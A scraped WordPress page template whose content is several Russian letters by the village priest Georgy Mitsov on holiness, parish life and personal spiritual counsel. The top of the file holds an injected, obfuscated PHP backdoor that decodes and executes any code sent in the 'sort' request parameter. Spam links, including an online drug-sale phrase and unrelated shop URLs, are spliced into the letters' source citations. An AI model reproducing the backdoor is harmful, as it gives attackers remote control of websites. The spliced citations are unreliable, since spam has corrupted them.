nnnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnnn?php /** * The template used for displaying page content in page.php * * @package dazzling */ ?>

Письма


Просим Вас направлять письма отца Георгия для размещения в этом разделе

Петр Георгиевич Мицов, старший сын отца Георгия

e-mail: mitsov@yandex.ru

телефон: +7 911 957 93 58


    Письмо отцу Герману (Подмошенскому)*

    Цель жизни – святость

    Дорогой и многоуважаемый во Христе отец Герман, благословите!

    С радостью получил Ваше письмо и буклет, посвящённый насельникам Свято-Германовской Пустыни. Особенно меня порадовало, что отцы и братия на фотографии улыбаются. Такие светлые и улыбающиеся лица я видел только на снимках, сделанных на старом Валааме. Мысль о необходимости подлинной святости постоянно тревожит и меня. Ведь наши люди ходить в церковь отучены и необходимости в этом пока не ощущают.

    Насильно угрозами или бедами людей к Богу приводить неловко. Ведь Господь говорит: “Не жертвы хочу, а милости”. А вот милостью сейчас, как и святостью, и не пахнет. Ведь когда на Руси было развито старчество и когда существовал институт (общественное признание) святых, то цель человеческой жизни, – святость, самоценность святости, была очевидна. Теперь этого нет. Теперь человек с рождения как бы соглашается со смертью, “отчаявАется”, и старается на этом материальном, временном “пиру жизни” наесться и нахватать как можно всего побольше. Поэтому возрождение истинных ценностей действительно возможно только через подлинных исповедников Православия: дивен Бог во святых Своих…

    Поэтому меня очень интересуют Ваши усилия и Ваш опыт по возрождению подлинной святости. Потому что духовных священников, способных быть духовниками, на всю большую страну не хватает.

    В нашей стране появился большой интерес к книгам святых отцов и истории русской церкви, в которой и заключена подлинная история России. Ваши публикации восполняют пробелы в этом. Особо благодарю за статью, напечатанную в предыдущем номере Вашего журнала, о Серафиме Розе (Роузе), нашем современнике, к которому у нас в России повышенный интерес.

    Ещё и ещё раз благодарю Вас за беспокойство о нас. Спаси Вас Господи!  Молюсь за Вас и Вашу братию, на Проскомидии вынимаю частицы за Вас!

    С Богом!

    Настоятель Воскресенской церкви села Теребени, священник Георгий Мицов.

    http://buildmate.com.sg/product/stain-remover/feed/ Журнал “Русский  паломник” (Валаамское общество Америки ), №4 1991 год, стр.21.

    *Об отце Германе можно прочитать здесь.

     


    Письмо представителю «Вестника русского христианского движения» в Москве А.Н. Богословскому

    Alprazolam To Buy Online Из жизни Церкви в России

    … С большой радостью получили две бандероли, которые пришли в канун Троицы, что несколько и задержало наше благодарственное письмо. Эти два дня, Родительская суббота и Пятидесятница, – самые многолюдные дни в нашем приходе. Церковь наша расположена на погосте, упоминаемом еще в  XVI веке, поэтому кладбище выросло уже на полметра от дорожек в высоту, так как оно небольшого размера , и, зарывая в землю очередного «новопреставленного», обязательно беспокоят трех-четырех своих приснопоминаемых предков. Так что за четыреста с лишним лет народу на нашем маленьком погосте не меньше, чем во всем районе.

    Когда я начал свое первое служение в этой церкви и зимой залез на колокольню, то все кладбище, огороженное, как бортами, оградой из валунов и с рубкой-церковью, представилось палубой авианосца, стремящегося на Восток, где все могилки, как самолетики, тоже были направлены в ту же сторону. Такое общее единодушное утверждение смысла меня в тот момент очень порадовало. Правда, в том же году на Троицу, когда я читал в алтаре, повернувшись лицом к пустой церкви, специальные коленопреклоненные молитвы, за все время чтения (которое продолжалось около часа) в церковь забрели только двое пьяненьких и, слоняясь по церкви, с недоумением глядели на меня. Все это навеяло на меня ощущение общей пустоты и покинутости. Но каково же было мое удивление, когда, выйдя на улицу, я видел что-то вроде первомайской демонстрации. На каждой могилке, за каждым заборчиком, было словно по шевелящемуся, занятому своим делом букету цветов; базарный говор и общая атмосфера приподнятости и праздника, где было место всем: детям, собакам и птицам. Оказалось, что неосознанное язычество настолько въелось генетически в плоть и кровь «скобаря», что «рубка» авианосца не является для него некоторой совестливой помехой, а всего лишь ларьком службы быта, где он в случае необходимости может отовариться свечкой или крестиком.

    Пока церковь была в загоне, она существовала как сила, хоть и гонимая, угнетенная, но сила. С появлением конкуренции со стороны других конфессий родному Православию противопоставить им, в большинстве случаев, кроме национальной верности – нечего. Вероятно, придется смириться с тем, что в будущем Православие будет одним из многих равноправных христианских исповеданий на территории России. Величина и глубина его, родного Православия, так велика, что для большинства нынешних молодых прихожан оно оказывается «зеленым виноградом», недосягаемым идеалом, который лучше оставить в сказочном прошлом. Как мне кажется, единственным способом преодоления этой напасти может быть только личное исповедание и соответствие святоотеческим идеалам. Только при искренности исповедания, и адекватности поведения исповедуемым идеалам, священник или прихожанин смогут создать, возродить ту систему ценностей, которая была, есть и будет. Без которой все нынешнее Православие превратится либо в двуличие, либо в глухую и жестокую стилизацию, потому что снаружи, с внешней стороны, гораздо легче подражать форме русского Православия, чем воистину ему соответствовать.

    Простите, пожалуйста, за многословие, не знаю, писал Вам или нет, но меня, наконец, пригласили в Опочецкую гимназию читать историю религий и историю мирового искусства. Еще раз благодарю Вас за внимание к нам и книги. Василия Васильевича Розанова я полюбил еще лет двадцать назад, когда впервые прочитал его «Короба» и «Уединенное», поразили искренность и удивительная глубина ощущений, в дальнейшем разочаровал «Апокалипсис», но максимализм – явление детское, и особенности творчества, сделавшие художника столь привлекательным и родным, со временем начинают восприниматься всего лишь как личные свойства характера. Но это со временем.

    Еще раз благодарю Вас за внимание к нашему приходу. Молюсь за Вас и желаю Вам всяческих благ. Присылайте еще имена, за кого молиться, есть время и возможность не остаться перед Вами и Вашим издательством в долгу.

    С Богом!

    Настоятель Воскресенской церкви села Теребени, священник Георгий Мицов.

    http://buildmate.com.sg/wp-content/plugins/yith-woocommerce-request-a-quote-premium/assets/js/{path Вестник русского христианского движения. 1992 №2 (165)

     


    Письмо Ростиславу

    Дорогой Слава,

    в Писании сказано: “… по плодам узнаете дела их”. К сожалению, человеческая память сильно искажается эмоциями, поэтому человек помнит прошлое как бы при вспышке фотоаппарата, и целые месяцы и годы выпадают из сознания.

    Для того чтобы восстановить действительные пути и направления в прошлом, надо взять лист чистой бумаги и разграфить его на три колонки. В первой колонке написать конкретные желания с детства, в хронологическом порядке. Во второй колонке – что получилось, что осуществилось. И в третьей колонке – что или кто явились причиной неудачи.

    Беда в том, что человек чаще всего превратно воспринимает себя, напрягается при фотографировании, меняет выражение лица при взгляде в зеркало на такое, какого обычно не имеет. Поэтому правдивые, реальные знания о себе можно получить по медицинским анализам, психологическим тестам или хотя бы по этой таблице.

    Как направление самолета познается по следу в небе, так и по жизненным событиям, оставшимся в памяти человека, можно определить вектор состоявшейся или несостоявшейся жизни.

    Не надо бояться грустных, неприятных, трагических воспоминаний. Не надо от них прятаться, так же, как боксеру нельзя закрывать глаза, когда он получает удар в нос, чтобы не получить более опасного удара. Не достойно человека дважды наступать на одни и те же грабли. По прочтении и выполнении этого задания, сообщи, пожалуйста, по телефону.

    С Богом!

    о. Георгий.

     


     

    Письмо Алексею

    Здравствуй, дорогой Алексей!

    Быстро и хорошо получил твое письмо. Спасибо. Лицеприятие или лицемерие незаметны и постоянны, как земное тяготение. Ты, вероятно, знаешь, что человекоугодие – это грех, человеколюбие – это то, как должно быть. Но куда легче кивнуть, согласиться, похвалить, а не брать на себя многолетнюю ответственность по исправлению и приближению к идеалу. Потому, что сказав “а”, приходится говорить весь алфавит, прожить с человеком всю жизнь, пока кому-то не надоест. Можно, правда, формализовать этот процесс и вместо серджечного участия и пережэивания в каждый соответствущий момент говорить то, что надо, то. Что положено. Но лучший вариант – собственная “прозрачность”, когда самость отвергнута, когда собственное “я” уже не главное лицо. Тогда некому страдать, волноваться. Ведь ты сам знаешь, что тело должно подчиняться душе. Другие – не лакмусовая бумажка, не индикатор приятного-неприятного, не сросшийся с телом сенсорный датчик, который распадается вместе с телом, как тонущий вместе с автомобилем водитель, а ® гусеница, куколка, бабочка. Не зря на античных изображениях, на истуканах будущих людей (т.е. создаваемых богами), сделанных Прометеем или Япетом, Афина на головы сажала бабочек – души. Но душа должна подвинуться совсем так же, как тело должно дать место, управление душе, а не ощущениям или чувствам. И когда человек честно говорит: “Господи, храм души моея пуст, приди и вечеряй в нем, вселися в него”, ощущение постоянной “духовной нищеты” только и может напрячь человека в поисках Духа, а значит – Бога.

    Зря ты так легко отнесся к спору злата и булата, может быть, это еще болезненно? Но ведь это проблема нынешнего времени. Очень уважаемая мною Ольга Мих. Фрейденберг писала, что для индоевропейцев еще в древние, первобытные времена было куда легче отобрать, отбить, ограбить, чем выменять или выторговать. Поэтому-то большинство купцов-гостей были восточного происхождения, они не брезговали немужской торговлей, но могли и воевать. В одной из грамот патриарха Ионы, которая начиналась от Адама, было сказано: “…у Ноя было три сына: Сим должен был молиться, Хам должен был работать, Яфет – воевать.” Вот это-то боевое дерзновение, готовность вспрянуть, стыдиться до ужаса своей трусости и есть не только языковая, но и этическая сущность индоевропейских корней. Стоит толлько заглянуть в обозримую историю: Рамаяна с Бхагавадгитой, Эдды, Нибелунги, Былины – все боевые эпосы, с культом не так силы, а чести и смелости (“Слово о полку Игореве”). “…и искали себе чести, а князю – славы”. Для восточного человека – с ценностями богатства и неги, с возможностью “менять гири и давать в рост иноплеменникам”. С установлением банковских отношений и кабалой долгов, покупкой армий и государств, с насаждением торгового образа жизни, противоестественного для большинства местного населения. Торговать, стяжать русский человек может ради какой-то более высокой цели, но не для денежного коллекционирования. Не деньги ради денег, а бензин, чтобы добраться до исповедуемой цели, где “царство Мое не от мира сего”.

    В “Толковой Библии” Лопухина т. 3 толкование на Марка, 9.49 : “Ибо всякий огнем осолится, и всякая жертва солью осолится”. – “Не бойтесь, говорит Христос, духовного самоотречения. Для избежания соблазнов не щадите своего тела, соблазняющего вас, ибо путь верного Моего учееника, как истинной духовной жертвы Богу, есть путь осоления огнем, т.е. огнем самопожертвования, самоотречения, духовного очищения. Нужно вообще иметь “соль” в себе, т.е. христианский дух, христианское всегдашнее настроение, христианские принципы веры и жизни, и раз эта “соль” потеряет в нас силу, мы уже не можем воздействовать на других. Не будет между нами и мира, и мы будем спорить, кто больший из нас.” (Труды Киевской Духовной Академии, 1909 г.).

    По поводу стиха Лк 3.16 нужно сделать упор на то, что многие Иоанна принимали за Мессию, а так как вода и Дух на иврите близки по звучанию, то противопоставление воде Иордановой – огонь. = Мф 3.11.

    Но еще ты ведь помнишь видение матери пророка Илии, где ангелы младенца Илию пеленали огнем. Конечно, огонь бывает разный: и геенский, и очищающий, – но он может быть и “углем в сердце” – тогда уже не страшен никакой.

    С Богом! Радости Тебе о Господе.

    о. Георгий


     Письмо Татьяне

    Матушка, ангел, Ты ведь знаешь, что сколько не говори халва во рту слаще не будет. Не в том дело, что мы часто не общаемся, а в том, что нет сомнений в “родстве душ” и от этого ничего не изменится даже  если нас не будет. Люблю Тебя, Корову и козу, если она ещё жива, и очень рад, что со временем всё не нужное отлетает, а остаётся только реальное и необходимое.

    С Богом! Всех благ.

    о. Георгий.


     Письмо Дарье

    Дарья, я посмотрел Твой фильм “Я могу Петь”. Твоя героиня так долго ехала не зря. Она всё же приехала! Но её подгоняла мечта, мечта об искусстве. Как сделать, чтобы эта мечта была бы только переходом, а   не  самоцелью?

    Ещё в семидесятых годах  харизматический преподаватель слепоглухонемых в Загорске, сначала, когда они к нему приходили, учил их сначала смеяться и плакать, а только потом говорить и азбуке морзе. Ты ведь знаешь: сначала физический  уровень, затем душевный ( = эмоциональный, творческий), затем интеллектуальный, разумный.  Дух  же “дышит – где хочет”, как  сказано в Писании, Дух,  Святой  Дух необходим.  Поиск  Духа –  и  есть осмысленная жизнь человеков. Фраза Экзюпери о том, что в каждом ребёнке можно убить Моцарта, хорошо видна   в   начале Твоего фильма, когда ребёнок наступает то ли на жёлудь, то ли на пистолетный патрон. Это мгновение, но для меня это – толчок и для лично моих терзаний по заданной Тобой теме. Ведь в Опочке есть тоже школа для глухонемых, а их некогда клуб купила в начале 90х  за бесценок … на западные деньги… “Церковь Христа”. Они, т.е. глухонемые, для меня не чужие, но в другом аспекте.

    Спасибо за фильм, всех Тебе благ и успехов.

    С Богом!

    о. Георгий.


     

    Письмо Дарье

    Не волнуйся и не отождествляйся. Всё будет так, как Тебе  это будет полезно. Пожалуйста, “не выковыривай из булки изюм”, не думай, чтобы было так, как Ты хочешь. Человек растёт (внутренне) только тогда, когда ему плохо, иначе и незачем, иначе чтобы было так, как всегда.

    С Богом!

    о.Георгий.